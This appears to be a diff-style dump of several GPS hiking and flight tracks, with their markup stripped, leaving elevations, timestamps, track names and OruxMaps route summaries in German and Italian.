+2015-04-22T12:02:41Z
+
+
+816.3
+2015-04-22T12:03:31Z
+
+
+813.41
+2015-04-22T12:03:58Z
+
+
+807.16
+2015-04-22T12:04:51Z
+
+
+801.88
+2015-04-22T12:05:27Z
+
+
+801.4
+2015-04-22T12:06:52Z
+ "
+"
+
+
+
+
+
+
+
+BIS 1
+
+
+
+1905.2
+
+
+1909.6
+
+
+1915.7
+
+
+1912.4
+
+
+1915.1
+
+
+1924.7
+
+
+1924.6
+
+
+1956.8
+
+
+1957.0
+
+
+1972.9
+
+
+1971.6
+
+
+1995.0
+
+
+2000.9
+
+
+2023.6
+
+
+2032.7
+
+
+2028.7
+
+
+2034.5
+
+
+2038.4
+
+
+2044.8
+
+
+2057.2
+
+
+2066.9
+
+
+2076.3
+
+
+2077.6
+
+
+2095.0
+
+
+2094.7
+
+
+2114.9
+
+
+2124.6
+
+
+2137.7
+
+
+2145.7
+
+
+2152.4
+
+
+2164.6
+
+
+2165.5
+
+
+2175.9
+
+
+2187.2
+
+
+2184.3
+
+
+2181.6
+
+
+2176.6
+
+
+2177.8
+
+
+2180.4
+
+
+2200.3
+
+
+2219.0
+
+
+2231.4
+
+
+2241.9
+
+
+2239.6
+
+
+2248.3
+
+
+2249.9
+
+
+2262.7
+
+
+2268.2
+
+
+2279.4
+
+
+2291.7
+
+
+2310.8
+
+
+2316.7
+
+
+2342.5
+
+
+2408.9
+
+
+2409.7
+
+
+2428.0
+
+
+2434.0
+
+
+2444.3
+
+
+2462.1
+
+
+2475.0
+
+
+2493.1
+
+
+2502.2
+
+
+2511.9
+
+
+2516.3
+
+
+2525.3
+ "
+"
+
+
+1111nivolet ab
+
+
+
+
+
+OruxMaps
+2015-12-11T12:12:37Z
+
+
+1111nivolet ab
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: 1111nivolet ab</h2><br /><p>Startzeit: 12/11/2015 13:12</p><p>Zielzeit: 12/11/2015 15:58</p><p>Strecke: 5km (02:46)</p><p>Bewegungszeit: 01:08</p><p>Ø-Geschwindigkeit: 1,8km/h</p><p>Netto-Geschwindigkeit: 4,4km/h</p><p>Max. Geschwindigkeit: 9,6km/h</p><p>Minimale Höhe: 630m</p><p>Maximale Höhe: 1537m</p><p>Steig-Geschw.: 275,2m/h</p><p>Sink-Geschw.: -424m/h</p><p>Aufstieg: 96m</p><p>Abstieg: -991m</p><p>Steigzeit: 00:21</p><p>Sinkzeit: 02:20</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+1537.88
+2015-12-11T12:12:40Z
+
+
+1528.03
+2015-12-11T12:14:22Z
+
+
+1527.97
+2015-12-11T12:15:08Z
+
+
+1527.86
+2015-12-11T12:15:33Z
+
+
+1526.62
+2015-12-11T12:37:28Z
+
+
+1522.38
+2015-12-11T12:37:47Z
+
+
+1495.02
+2015-12-11T12:40:09Z
+
+
+1481.47
+2015-12-11T12:41:49Z
+
+
+1469.04
+2015-12-11T12:43:03Z
+
+
+1481.37
+2015-12-11T12:43:46Z
+
+
+1476.51
+2015-12-11T12:43:54Z
+
+
+1463.81
+2015-12-11T12:45:26Z
+
+
+1451.13
+2015-12-11T12:46:08Z
+
+
+1410.38
+2015-12-11T12:49:26Z
+
+
+1381.04
+2015-12-11T12:51:45Z
+
+
+1361.03
+2015-12-11T12:53:37Z
+
+
+1313.5
+2015-12-11T12:57:23Z
+
+
+1304.25
+2015-12-11T12:58:20Z
+
+
+1298.85
+2015-12-11T12:58:37Z
+
+
+1266.04
+2015-12-11T13:02:01Z
+
+
+1254.9
+2015-12-11T13:03:09Z
+
+
+1244.87
+2015-12-11T13:04:04Z
+
+
+1238.49
+2015-12-11T13:04:18Z
+
+
+1217.04
+2015-12-11T13:06:22Z
+
+
+1203.26
+2015-12-11T13:08:06Z
+
+
+1178.41
+2015-12-11T13:10:40Z
+
+
+1170.52
+2015-12-11T13:14:06Z
+
+
+1158.67
+2015-12-11T13:17:05Z
+
+
+1167.93
+2015-12-11T13:17:07Z
+
+
+1175.32
+2015-12-11T13:17:12Z
+
+
+1133.75
+2015-12-11T13:18:47Z
+
+
+1143.78
+2015-12-11T13:20:35Z
+
+
+1134.75
+2015-12-11T13:25:16Z
+
+
+1130.69
+2015-12-11T13:27:35Z
+
+
+1119.03
+2015-12-11T13:30:25Z
+
+
+1081.53
+2015-12-11T13:33:49Z
+
+
+1066.13
+2015-12-11T13:35:18Z
+
+
+1040.88
+2015-12-11T13:42:41Z
+
+
+1031.38
+2015-12-11T13:47:47Z
+
+
+989.79
+2015-12-11T13:49:39Z
+
+
+972.38
+2015-12-11T13:51:06Z
+
+
+958.0
+2015-12-11T14:03:02Z
+
+
+974.79
+2015-12-11T14:13:20Z
+
+
+951.88
+2015-12-11T14:20:47Z
+
+
+918.86
+2015-12-11T14:23:58Z
+
+
+916.51
+2015-12-11T14:24:28Z
+
+
+913.62
+2015-12-11T14:26:06Z
+
+
+901.02
+2015-12-11T14:28:33Z
+
+
+872.06
+2015-12-11T14:30:38Z
+
+
+836.74
+2015-12-11T14:34:12Z
+
+
+820.85
+2015-12-11T14:36:14Z
+
+
+770.08
+2015-12-11T14:41:22Z
+
+
+760.88
+2015-12-11T14:42:23Z
+
+
+751.13
+2015-12-11T14:43:05Z
+
+
+723.38
+2015-12-11T14:44:34Z
+
+
+692.62
+2015-12-11T14:46:29Z
+
+
+687.87
+2015-12-11T14:47:35Z
+
+
+682.22
+2015-12-11T14:49:04Z
+
+
+659.23
+2015-12-11T14:56:19Z
+
+
+633.76
+2015-12-11T14:57:56Z
+
+
+631.19
+2015-12-11T14:58:42Z
+ "
+"
+
+
+Pilatus
+
+Monika Teusch - Community
+
+
+
+2016-05-27T13:16:16Z
+
+Pilatus
+
+
+
+1218.58191
+
+
+1204.08875
+
+
+1212.0625
+
+
+1226.02014
+
+
+1253.44275
+
+
+1283.72925
+
+
+1313.84546
+
+
+1321.05151
+
+
+1329.26367
+
+
+1335.9989
+
+
+1388.81824
+
+
+1399.00562
+
+
+1457.24719
+
+
+1460.63086
+
+
+1510.20996
+
+
+1505.82568
+
+
+1516.10547
+
+
+1521.5376
+
+
+1526.85596
+
+
+1528.45386
+
+
+1538.56934
+
+
+1566.05566
+
+
+1572.70288
+
+
+1598.17383
+
+
+1595.49902
+
+
+1599.05981
+
+
+1603.67139
+
+
+1606.63623
+
+
+1608.14404
+
+
+1614.42725
+
+
+1606.86279
+
+
+1607.14136
+
+
+1607.76416
+
+
+1597.0835
+
+
+1609.53467
+
+
+1608.15723
+
+
+1603.26685
+
+
+1578.29663
+
+
+1571.15234
+
+
+1559.25781
+
+
+1552.13379
+
+
+1561.44141
+
+
+1572.25635
+
+
+1585.23096
+
+
+1636.33814
+
+
+1648.32275
+
+
+1676.28272
+
+
+1681.52881
+
+
+1683.85327
+
+
+1693.48926
+
+
+1702.23828
+
+
+1736.0896
+
+
+1742.67993
+
+
+1771.89673
+
+
+1784.38721
+
+
+1800.02002
+
+
+1815.0061
+
+
+1822.08203
+
+
+1837.92285
+
+
+1847.70117
+
+
+1861.09424
+
+
+1846.5044
+
+
+1858.40869
+
+
+1862.84863
+
+
+1877.77832
+
+
+1912.42529
+
+
+1917.78296
+
+
+1950.29297
+
+
+1965.88574
+
+
+2012.53662
+
+
+2051.12877
+
+
+2051.29747
+
+
+2064.98594
+
+
+2062.61534
+
+
+2062.59019
+
+
+2057.78111
+
+
+2067.87671
+
+
+2067.88047
+ "
+"
+
+
+Lance Sud de Malissard
+
+
+
+
+
+OruxMaps
+2015-11-05T09:09:09Z
+
+
+Lance Sud de Malissard
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Lance Sud de Malissard</h2><br /><p>Startzeit: 11/05/2015 10:09</p><p>Zielzeit: 11/05/2015 13:00</p><p>Strecke: 6,3km (02:51)</p><p>Bewegungszeit: 01:53</p><p>Ø-Geschwindigkeit: 2,2km/h</p><p>Netto-Geschwindigkeit: 3,3km/h</p><p>Max. Geschwindigkeit: 7,1km/h</p><p>Minimale Höhe: 990m</p><p>Maximale Höhe: 2044m</p><p>Steig-Geschw.: 456,2m/h</p><p>Sink-Geschw.: -226,6m/h</p><p>Aufstieg: 1096m</p><p>Abstieg: -82m</p><p>Steigzeit: 02:24</p><p>Sinkzeit: 00:21</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+1031.63
+2015-11-05T09:09:10Z
+
+
+1004.55
+2015-11-05T09:10:14Z
+
+
+999.8
+2015-11-05T09:13:27Z
+
+
+1000.38
+2015-11-05T09:13:46Z
+
+
+1009.79
+2015-11-05T09:14:59Z
+
+
+1028.88
+2015-11-05T09:16:57Z
+
+
+1055.41
+2015-11-05T09:19:20Z
+
+
+1052.37
+2015-11-05T09:21:05Z
+
+
+1057.87
+2015-11-05T09:21:49Z
+
+
+1084.47
+2015-11-05T09:24:09Z
+
+
+1143.38
+2015-11-05T09:30:13Z
+
+
+1150.87
+2015-11-05T09:32:11Z
+
+
+1159.31
+2015-11-05T09:33:37Z
+
+
+1186.76
+2015-11-05T09:37:07Z
+
+
+1186.38
+2015-11-05T09:37:40Z
+
+
+1189.89
+2015-11-05T09:39:33Z
+
+
+1189.26
+2015-11-05T09:40:09Z
+
+
+1206.4
+2015-11-05T09:41:37Z
+
+
+1202.35
+2015-11-05T09:42:30Z
+
+
+1207.76
+2015-11-05T09:43:44Z
+
+
+1210.41
+2015-11-05T09:44:32Z
+
+
+1218.1
+2015-11-05T09:45:35Z
+
+
+1231.88
+2015-11-05T09:46:45Z
+
+
+1236.49
+2015-11-05T09:49:08Z
+
+
+1238.78
+2015-11-05T09:50:35Z
+
+
+1262.12
+2015-11-05T09:56:14Z
+
+
+1266.01
+2015-11-05T09:58:14Z
+
+
+1280.87
+2015-11-05T10:03:13Z
+
+
+1308.11
+2015-11-05T10:04:57Z
+
+
+1327.38
+2015-11-05T10:07:48Z
+
+
+1329.38
+2015-11-05T10:08:17Z
+
+
+1347.91
+2015-11-05T10:09:53Z
+
+
+1364.89
+2015-11-05T10:13:22Z
+
+
+1387.12
+2015-11-05T10:15:51Z
+
+
+1399.1
+2015-11-05T10:17:14Z
+
+
+1407.38
+2015-11-05T10:18:01Z
+
+
+1417.5
+2015-11-05T10:19:23Z
+
+
+1442.25
+2015-11-05T10:23:52Z
+
+
+1467.76
+2015-11-05T10:27:31Z
+
+
+1481.86
+2015-11-05T10:28:58Z
+
+
+1484.84
+2015-11-05T10:29:33Z
+
+
+1476.83
+2015-11-05T10:32:23Z
+
+
+1530.32
+2015-11-05T10:36:01Z
+
+
+1533.66
+2015-11-05T10:37:29Z
+
+
+1559.29
+2015-11-05T10:41:09Z
+
+
+1582.98
+2015-11-05T10:43:35Z
+
+
+1605.9
+2015-11-05T10:46:29Z
+
+
+1601.21
+2015-11-05T10:47:36Z
+
+
+1628.63
+2015-11-05T10:51:41Z
+
+
+1623.01
+2015-11-05T10:52:58Z
+
+
+1631.88
+2015-11-05T10:54:46Z
+
+
+1646.87
+2015-11-05T10:55:57Z
+
+
+1672.37
+2015-11-05T10:59:19Z
+
+
+1664.35
+2015-11-05T11:00:43Z
+
+
+1680.23
+2015-11-05T11:02:03Z
+
+
+1712.78
+2015-11-05T11:04:59Z
+
+
+1737.78
+2015-11-05T11:07:53Z
+
+
+1743.92
+2015-11-05T11:09:23Z
+
+
+1768.71
+2015-11-05T11:10:38Z
+
+
+1783.9
+2015-11-05T11:12:01Z
+
+
+1800.38
+2015-11-05T11:14:35Z
+
+
+1815.33
+2015-11-05T11:17:43Z
+
+
+1835.11
+2015-11-05T11:19:52Z
+
+
+1864.84
+2015-11-05T11:23:11Z
+
+
+1883.88
+2015-11-05T11:25:57Z
+
+
+1887.39
+2015-11-05T11:27:44Z
+
+
+1903.38
+2015-11-05T11:34:21Z
+
+
+1974.5
+2015-11-05T11:47:17Z
+
+
+2010.53
+2015-11-05T11:54:24Z
+
+
+2041.85
+2015-11-05T11:58:53Z
+
+
+2044.38
+2015-11-05T12:00:47Z
+ "
+"
+
+
+Tourenplanung am 22. Juni 2017
+
+Monika Teusch - Community
+
+
+
+2017-06-22T16:58:21Z
+
+Tourenplanung am 22. Juni 2017
+
+
+
+2066.7063
+
+
+2061.34078
+
+
+2058.02394
+
+
+2090.3417
+
+
+2042.13588
+
+
+2065.58531
+
+
+2024.72178
+
+
+2033.9494
+
+
+2043.37738
+
+
+2044.95175
+
+
+2055.90832
+
+
+2077.73022
+
+
+2089.74576
+
+
+2080.17383
+
+
+2102.35598
+
+
+2108.7789
+
+
+2114.99212
+
+
+2126.86859
+
+
+2115.80335
+
+
+2102.64863
+
+
+2087.65003
+
+
+2102.94794
+
+
+2074.24787
+
+
+2056.99143
+
+
+2046.50171
+
+
+2043.80309
+
+
+2045.44082
+
+
+2038.40251
+
+
+2048.06772
+
+
+2046.31764
+
+
+2054.13811
+
+
+2054.96699
+
+
+2039.79748
+
+
+2052.96112
+
+
+2057.60919
+
+
+2063.09741
+
+
+2066.7
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-06-05T15:38:12Z
+
+2015-06-05 17:38:08
+
+
+
+
+
+
+1085.53
+2015-06-05T13:42:39Z
+
+
+1072.03
+2015-06-05T13:44:38Z
+
+
+1053.77
+2015-06-05T13:46:24Z
+
+
+1040.59
+2015-06-05T13:47:39Z
+
+
+1026.56
+2015-06-05T13:48:37Z
+
+
+1019.9
+2015-06-05T13:53:03Z
+
+
+1038.18
+2015-06-05T13:54:31Z
+
+
+1051.59
+2015-06-05T13:55:41Z
+
+
+1058.24
+2015-06-05T13:56:41Z
+
+
+1057.29
+2015-06-05T13:57:41Z
+
+
+1062.82
+2015-06-05T13:58:39Z
+
+
+1069.63
+2015-06-05T13:59:39Z
+
+
+1090.67
+2015-06-05T14:02:42Z
+
+
+1096.51
+2015-06-05T14:03:44Z
+
+
+1107.44
+2015-06-05T14:05:09Z
+
+
+1120.7
+2015-06-05T14:06:31Z
+
+
+1137.22
+2015-06-05T14:07:50Z
+
+
+1157.41
+2015-06-05T14:09:10Z
+
+
+1184.34
+2015-06-05T14:12:47Z
+
+
+1200.26
+2015-06-05T14:15:08Z
+
+
+1212.66
+2015-06-05T14:16:29Z
+
+
+1247.14
+2015-06-05T14:20:12Z
+
+
+1268.61
+2015-06-05T14:22:34Z
+
+
+1279.62
+2015-06-05T14:23:44Z
+
+
+1292.44
+2015-06-05T14:24:54Z
+
+
+1311.18
+2015-06-05T14:29:10Z
+
+
+1331.44
+2015-06-05T14:31:18Z
+
+
+1350.11
+2015-06-05T14:33:27Z
+
+
+1357.91
+2015-06-05T14:34:34Z
+
+
+1371.36
+2015-06-05T14:35:43Z
+
+
+1393.17
+2015-06-05T14:38:19Z
+
+
+1408.39
+2015-06-05T14:39:38Z
+
+
+1419.28
+2015-06-05T14:40:44Z
+
+
+1433.42
+2015-06-05T14:41:54Z
+
+
+1445.12
+2015-06-05T14:43:01Z
+
+
+1458.87
+2015-06-05T14:44:29Z
+
+
+1498.34
+2015-06-05T14:49:49Z
+
+
+1503.25
+2015-06-05T14:53:50Z
+
+
+1494.31
+2015-06-05T14:56:10Z
+
+
+1459.79
+2015-06-05T14:59:38Z
+
+
+1437.92
+2015-06-05T15:03:10Z
+
+
+1422.54
+2015-06-05T15:04:13Z
+
+
+1408.5
+2015-06-05T15:05:00Z
+
+
+1393.79
+2015-06-05T15:05:46Z
+
+
+1372.11
+2015-06-05T15:07:10Z
+
+
+1358.29
+2015-06-05T15:07:57Z
+
+
+1318.11
+2015-06-05T15:10:43Z
+
+
+1307.3
+2015-06-05T15:11:20Z
+
+
+1295.47
+2015-06-05T15:11:57Z
+
+
+1282.03
+2015-06-05T15:12:29Z
+
+
+1271.61
+2015-06-05T15:13:00Z
+
+
+1254.97
+2015-06-05T15:14:27Z
+
+
+1188.61
+2015-06-05T15:31:56Z
+
+
+1161.8
+2015-06-05T15:34:21Z
+
+
+1141.91
+2015-06-05T15:35:19Z
+
+
+1121.39
+2015-06-05T15:38:05Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+GPSies Track
+
+
+
+
+GPSies Track on GPSies.com
+2016-09-24T16:32:51Z
+
+GPSies Track on GPSies.com
+
+
+
+686.0
+2010-01-01T00:00:00Z
+
+
+695.0
+2010-01-01T00:00:24Z
+
+
+720.0
+2010-01-01T00:01:17Z
+
+
+729.0
+2010-01-01T00:01:40Z
+
+
+736.0
+2010-01-01T00:02:46Z
+
+
+740.0
+2010-01-01T00:03:05Z
+
+
+759.0
+2010-01-01T00:04:00Z
+
+
+765.0
+2010-01-01T00:04:25Z
+
+
+768.0
+2010-01-01T00:04:36Z
+
+
+772.0
+2010-01-01T00:04:53Z
+
+
+792.0
+2010-01-01T00:05:22Z
+
+
+801.0
+2010-01-01T00:05:42Z
+
+
+814.0
+2010-01-01T00:06:00Z
+
+
+841.0
+2010-01-01T00:06:45Z
+
+
+859.0
+2010-01-01T00:07:01Z
+
+
+882.0
+2010-01-01T00:07:31Z
+
+
+903.0
+2010-01-01T00:08:06Z
+
+
+936.0
+2010-01-01T00:08:55Z
+
+
+963.0
+2010-01-01T00:09:25Z
+
+
+1018.0
+2010-01-01T00:10:12Z
+
+
+1052.0
+2010-01-01T00:11:01Z
+
+
+1074.0
+2010-01-01T00:11:28Z
+
+
+1101.0
+2010-01-01T00:12:07Z
+
+
+1100.0
+2010-01-01T00:12:38Z
+
+
+1106.0
+2010-01-01T00:13:16Z
+
+
+1123.0
+2010-01-01T00:13:53Z
+
+
+1154.0
+2010-01-01T00:14:35Z
+
+
+1177.0
+2010-01-01T00:15:07Z
+
+
+1200.0
+2010-01-01T00:15:35Z
+
+
+1214.0
+2010-01-01T00:15:56Z
+
+
+1205.0
+2010-01-01T00:16:19Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2016-08-31T08:41:50Z
+
+
+Lamnivatnet Pieskehaure
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+695.10546875
+
+
+674.05859375
+
+
+627.0
+
+
+655.98046875
+
+
+625.609375
+
+
+588.8125
+
+
+634.91015625
+
+
+654.50390625
+
+
+680.31640625
+
+
+669.6953125
+
+
+630.2421875
+
+
+633.62109375
+
+
+597.0625
+
+
+586.30859375
+
+
+612.04296875
+
+
+593.140625
+
+
+594.12890625
+
+
+592.9375
+
+
+588.78515625
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+
+queyras1
+
+
+queyras1_0
+
+
+queyras1_1
+
+
+queyras1_2
+
+
+queyras1_3
+
+
+queyras1_4
+
+
+queyras1_5
+
+
+queyras1_6
+
+
+queyras1_7
+
+
+queyras1_8
+
+
+queyras1_9
+
+
+queyras1_10
+
+
+queyras1_11
+
+
+queyras1_12
+
+
+queyras1_13
+
+
+queyras1_14
+
+
+queyras1_15
+
+
+queyras1_16
+
+
+queyras1_17
+
+
+queyras1_18
+
+
+queyras1_19
+
+
+queyras1_20
+
+
+queyras1_21
+
+
+queyras1_22
+
+
+queyras1_23
+
+
+queyras1_24
+
+
+queyras1_25
+
+
+queyras1_26
+
+
+queyras1_27
+
+
+queyras1_28
+
+
+queyras1_29
+
+
+queyras1_30
+
+
+queyras1_31
+
+
+queyras1_32
+
+
+queyras1_33
+
+
+queyras1_34
+
+
+queyras1_35
+
+
+queyras1_36
+
+
+queyras1_37
+
+
+queyras1_38
+
+
+queyras1_39
+
+
+queyras1_40
+
+
+queyras1_41
+
+
+queyras1_42
+
+
+queyras1_43
+
+
+queyras1_44
+
+
+queyras1_45
+
+
+queyras1_46
+
+
+queyras1_47
+
+
+queyras1_48
+
+
+queyras1_49
+
+
+queyras1_50
+
+
+queyras1_51
+
+
+queyras1_52
+
+
+queyras1_53
+
+
+queyras1_54
+
+
+queyras1_55
+
+
+queyras1_56
+
+
+queyras1_57
+
+
+queyras1_58
+
+
+queyras1_59
+
+
+queyras1_60
+
+
+queyras1_61
+
+
+queyras1_62
+
+
+queyras1_63
+
+
+queyras1_64
+
+
+queyras1_65
+
+
+queyras1_66
+
+
+queyras1_67
+
+
+queyras1_68
+
+
+queyras1_69
+
+
+queyras1_70
+
+
+queyras1_71
+
+
+queyras1_72
+
+
+queyras1_73
+
+
+queyras1_74
+
+
+queyras1_75
+
+
+queyras1_76
+ "
+"
+
+
+2016-09-10 08:26-via caí vedano
+
+
+
+
+
+OruxMaps
+2016-09-10T06:26:27Z
+
+
+2016-09-10 08:26-via caí vedano
+<p>Orario inizio: 09/10/2016 08:26</p><p>Orario fine: 09/10/2016 15:25</p><p>Distanza: 4,5 km (06:58)</p><p>Tempo movimento: 01:08</p><p>Velocità media: 0,65 km/h</p><p>Velocità media mov.: 4 km/h</p><p>Max. Velocità: 7,36km/h</p><p>Altitudine minima: 1410 m</p><p>Altitudine massima: 1788 m</p><p>Velocità di salita: 56,9 m/h</p><p>Velocità di discesa: -391 m/h</p><p>Dislivello positivo: 346 m</p><p>Perdita di elevazione: -321 m</p><p>Tempo di salita: 06:05</p><p>Tempo di discesa: 00:49</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Non definito
+
+
+
+
+
+1426.87
+2016-09-10T06:26:31Z
+
+
+1426.48
+2016-09-10T06:27:48Z
+
+
+1441.0
+2016-09-10T06:29:29Z
+
+
+1459.97
+2016-09-10T06:31:11Z
+
+
+1472.19
+2016-09-10T06:32:07Z
+
+
+1482.73
+2016-09-10T06:33:31Z
+
+
+1487.08
+2016-09-10T06:34:59Z
+
+
+1500.45
+2016-09-10T06:37:21Z
+
+
+1502.24
+2016-09-10T06:37:58Z
+
+
+1503.9
+2016-09-10T06:38:13Z
+
+
+1538.37
+2016-09-10T06:42:50Z
+
+
+1541.17
+2016-09-10T06:43:33Z
+
+
+1562.07
+2016-09-10T06:46:44Z
+
+
+1564.19
+2016-09-10T06:47:24Z
+
+
+1590.56
+2016-09-10T06:51:16Z
+
+
+1594.32
+2016-09-10T06:52:40Z
+
+
+1614.76
+2016-09-10T06:54:39Z
+
+
+1628.7
+2016-09-10T06:59:12Z
+
+
+1628.08
+2016-09-10T07:00:41Z
+
+
+1631.15
+2016-09-10T07:02:18Z
+
+
+1638.19
+2016-09-10T07:04:26Z
+
+
+1644.6
+2016-09-10T07:06:45Z
+
+
+1659.55
+2016-09-10T07:09:57Z
+
+
+1665.35
+2016-09-10T07:10:37Z
+
+
+1669.01
+2016-09-10T07:12:06Z
+
+
+1686.23
+2016-09-10T07:13:56Z
+
+
+1690.76
+2016-09-10T07:15:41Z
+
+
+1698.79
+2016-09-10T07:37:06Z
+
+
+1764.23
+2016-09-10T12:20:58Z
+
+
+1758.71
+2016-09-10T12:22:29Z
+
+
+1743.23
+2016-09-10T12:24:02Z
+
+
+1691.98
+2016-09-10T12:28:05Z
+
+
+1684.87
+2016-09-10T12:29:02Z
+
+
+1691.86
+2016-09-10T12:29:56Z
+
+
+1686.94
+2016-09-10T12:44:51Z
+
+
+1677.73
+2016-09-10T12:46:10Z
+
+
+1670.01
+2016-09-10T12:47:36Z
+
+
+1658.06
+2016-09-10T12:49:00Z
+
+
+1639.6
+2016-09-10T12:50:58Z
+
+
+1636.81
+2016-09-10T12:51:24Z
+
+
+1631.85
+2016-09-10T12:53:06Z
+
+
+1633.1
+2016-09-10T12:53:37Z
+
+
+1628.8
+2016-09-10T12:54:18Z
+
+
+1625.89
+2016-09-10T12:55:47Z
+
+
+1626.1
+2016-09-10T12:56:39Z
+
+
+1616.0
+2016-09-10T12:58:19Z
+
+
+1610.79
+2016-09-10T12:59:23Z
+
+
+1591.43
+2016-09-10T13:01:12Z
+
+
+1592.01
+2016-09-10T13:02:06Z
+
+
+1579.55
+2016-09-10T13:03:57Z
+
+
+1580.09
+2016-09-10T13:05:23Z
+
+
+1550.27
+2016-09-10T13:08:51Z
+
+
+1540.1
+2016-09-10T13:10:58Z
+
+
+1523.46
+2016-09-10T13:13:34Z
+
+
+1511.81
+2016-09-10T13:15:12Z
+
+
+1509.6
+2016-09-10T13:17:27Z
+
+
+1496.5
+2016-09-10T13:18:48Z
+
+
+1478.96
+2016-09-10T13:20:42Z
+
+
+1465.62
+2016-09-10T13:21:47Z
+
+
+1418.3
+2016-09-10T13:25:18Z
+ "
+"
+
+
+
+
+
+
+GPS dump for www.flightlog.org
+2016-12-05T19:28:48Z
+
+
+Track 001
+
+
+
+1029.7
+2016-12-03T09:01:03Z
+
+
+1025.8
+2016-12-03T09:06:03Z
+
+
+1030.6
+2016-12-03T09:07:03Z
+
+
+1024.9
+2016-12-03T09:08:33Z
+
+
+1028.2
+2016-12-03T09:10:03Z
+
+
+1037.4
+2016-12-03T09:11:03Z
+
+
+1037.8
+2016-12-03T09:11:50Z
+
+
+1044.6
+2016-12-03T09:12:33Z
+
+
+1049.9
+2016-12-03T09:14:03Z
+
+
+1065.2
+2016-12-03T09:16:03Z
+
+
+1082.5
+2016-12-03T09:18:03Z
+
+
+1087.8
+2016-12-03T09:21:03Z
+
+
+1091.7
+2016-12-03T09:23:03Z
+
+
+1104.2
+2016-12-03T09:24:33Z
+
+
+1134.0
+2016-12-03T09:29:33Z
+
+
+1134.0
+2016-12-03T09:30:33Z
+
+
+1163.8
+2016-12-03T09:36:03Z
+
+
+1200.3
+2016-12-03T09:40:33Z
+
+
+1241.2
+2016-12-03T09:48:33Z
+
+
+1264.7
+2016-12-03T09:54:33Z
+
+
+1295.9
+2016-12-03T09:59:03Z
+
+
+1308.0
+2016-12-03T10:00:33Z
+
+
+1386.3
+2016-12-03T10:10:33Z
+
+
+1406.0
+2016-12-03T10:12:33Z
+
+
+1447.4
+2016-12-03T10:19:33Z
+
+
+1469.9
+2016-12-03T10:22:03Z
+
+
+1494.5
+2016-12-03T10:23:33Z
+
+
+1525.7
+2016-12-03T10:30:03Z
+
+
+1519.5
+2016-12-03T10:32:03Z
+
+
+1538.7
+2016-12-03T10:33:33Z
+
+
+1545.9
+2016-12-03T10:34:33Z
+
+
+1558.9
+2016-12-03T10:44:33Z
+
+
+1571.8
+2016-12-03T10:46:33Z
+
+
+1610.3
+2016-12-03T10:51:03Z
+
+
+1650.2
+2016-12-03T10:55:03Z
+
+
+1656.0
+2016-12-03T10:56:03Z
+
+
+1674.2
+2016-12-03T11:00:33Z
+
+
+1695.4
+2016-12-03T11:03:03Z
+
+
+1726.6
+2016-12-03T11:07:03Z
+
+
+1740.6
+2016-12-03T11:08:03Z
+
+
+1764.6
+2016-12-03T11:09:33Z
+
+
+1771.8
+2016-12-03T11:15:03Z
+
+
+1832.8
+2016-12-03T11:23:03Z
+
+
+1886.7
+2016-12-03T11:32:03Z
+
+
+1909.8
+2016-12-03T11:34:33Z
+
+
+1930.9
+2016-12-03T11:39:03Z
+
+
+2016.9
+2016-12-03T11:51:03Z
+
+
+2041.5
+2016-12-03T11:56:33Z
+
+
+2044.3
+2016-12-03T11:57:33Z
+
+
+2060.7
+2016-12-03T12:00:33Z
+
+
+2087.1
+2016-12-03T12:04:33Z
+
+
+2091.9
+2016-12-03T12:13:33Z
+
+
+2096.7
+2016-12-03T12:16:03Z
+
+
+2115.0
+2016-12-03T12:18:33Z
+
+
+2133.7
+2016-12-03T12:21:03Z
+
+
+2156.8
+2016-12-03T12:24:33Z
+
+
+2195.3
+2016-12-03T12:31:03Z
+
+
+2219.8
+2016-12-03T12:39:33Z
+ "
+"
+
+
+D/CH Weil - Basel
+
+
+
+
+
+
+
+
+
+276.00000356438954
+
+
+276.2999992157848
+
+
+276.40000104973353
+
+
+276.5000010182585
+
+
+276.89225838517467
+
+
+278.30000251777085
+
+
+279.0999996539558
+
+
+279.10000104676334
+
+
+283.5
+
+
+283.5000011296802
+
+
+289.1999874540067
+
+
+300.9999668494059
+
+
+304.0999815753432
+
+
+308.70002483842
+
+
+322.399978202301
+
+
+331.5000410769293
+
+
+336.8
+
+
+354.8999283977306
+
+
+369.9000380436285
+
+
+396.1
+
+
+398.30006433837787
+
+
+401.7
+
+
+397.8000850607415
+
+
+393.7163349749666
+
+
+364.9000620863902
+
+
+362.7
+
+
+363.9999994115797
+
+
+362.30000728618177
+
+
+360.00367015747196
+
+
+357.0486246836695
+
+
+352.7
+
+
+343.00006228453356
+
+
+319.2000488971958
+
+
+316.1
+
+
+298.6000615216472
+
+
+287.8000029578497
+
+
+273.79997919589795
+
+
+272.09999923006706
+
+
+271.3
+
+
+266.39999879391485
+
+
+263.90000202948517
+
+
+260.3000039345421
+
+
+261.09999663803626
+
+
+260.000000171576
+
+
+258.300002625911
+
+
+258.70000360829204
+
+
+257.5999939721734
+
+
+256.2
+
+
+256.20000003929806
+
+
+256.29999921042366
+
+
+255.59999888758094
+
+
+255.99999379645556
+
+
+254.55062702104274
+
+
+253.8000020422218
+
+
+253.3999969955726
+
+
+252.9997155537673
+
+
+252.8000011961258
+
+
+252.87620552689603
+
+
+252.89999972892178
